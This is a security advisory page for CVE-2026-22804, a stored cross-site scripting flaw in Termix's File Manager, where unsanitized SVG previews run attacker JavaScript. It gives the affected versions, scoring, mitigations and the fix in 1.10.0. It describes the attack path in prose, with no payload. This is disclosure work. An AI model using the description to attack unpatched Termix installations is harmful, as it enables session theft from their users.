CVE-2026-22804
Published: 12 January 2026
Summary
CVE-2026-22804 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Termix Termix. Its CVSS base score is 8.0 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185); ranked at the 8.8th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog; a public proof-of-concept is referenced.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-15 (Information Output Filtering).
Deeper analysis
CVE-2026-22804 is a stored cross-site scripting (XSS) vulnerability affecting Termix, a web-based server management platform offering SSH terminal, tunneling, and file editing capabilities. The issue exists in versions 1.7.0 through 1.9.0 within the File Manager component, specifically in the FileViewer.tsx file located at src/ui/desktop/apps/file-manager/components/FileViewer.tsx. Termix fails to sanitize SVG file content before rendering it, enabling the injection of malicious payloads. The vulnerability is associated with CWE-79 (Improper Neutralization of Input During Web Page Generation) and CWE-269 (Improper Privilege Management), with a CVSS v3.1 base score of 8.0 (AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:N).
An attacker who has compromised a managed SSH server managed by Termix can exploit this vulnerability by planting a malicious SVG file on that server. When a Termix user previews the file via the File Manager, the unsanitized SVG content executes arbitrary JavaScript in the context of the Termix web application. This grants the attacker the ability to steal session tokens, manipulate the user's view of the application, or perform other actions within the victim's browser privileges, though it requires user interaction to trigger the preview.
The GitHub Security Advisory (GHSA-m3cv-5hgp-hv35) confirms the vulnerability and states that it is fixed in Termix version 1.10.0. Security practitioners should update to 1.10.0 or later to mitigate the issue, and in the interim, avoid previewing SVG files from untrusted SSH servers or implement client-side content sanitization.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-2418
Vulnerability details
Termix is a web-based server management platform with SSH terminal, tunneling, and file editing capabilities. From 1.7.0 to 1.9.0, Stored Cross-Site Scripting (XSS) vulnerability exists in the Termix File Manager component. The application fails to sanitize SVG file content before…
more
rendering it. This allows an attacker who has compromised a managed SSH server to plant a malicious file, which, when previewed by the Termix user, executes arbitrary JavaScript in the context of the application. The vulnerability is located in src/ui/desktop/apps/file-manager/components/FileViewer.tsx. This vulnerability is fixed in 1.10.0.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS via unsanitized SVG directly enables browser session hijacking and web session cookie theft in the Termix web app.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
SI-15 requires filtering of information outputs before rendering, directly preventing the execution of malicious JavaScript in unsanitized SVG files previewed in the File Manager.
SI-10 mandates validation of information inputs such as SVG file content, blocking malicious payloads from being processed in the FileViewer component.
SI-2 ensures flaws like the SVG sanitization failure are identified and remediated, as demonstrated by the patch in Termix version 1.10.0.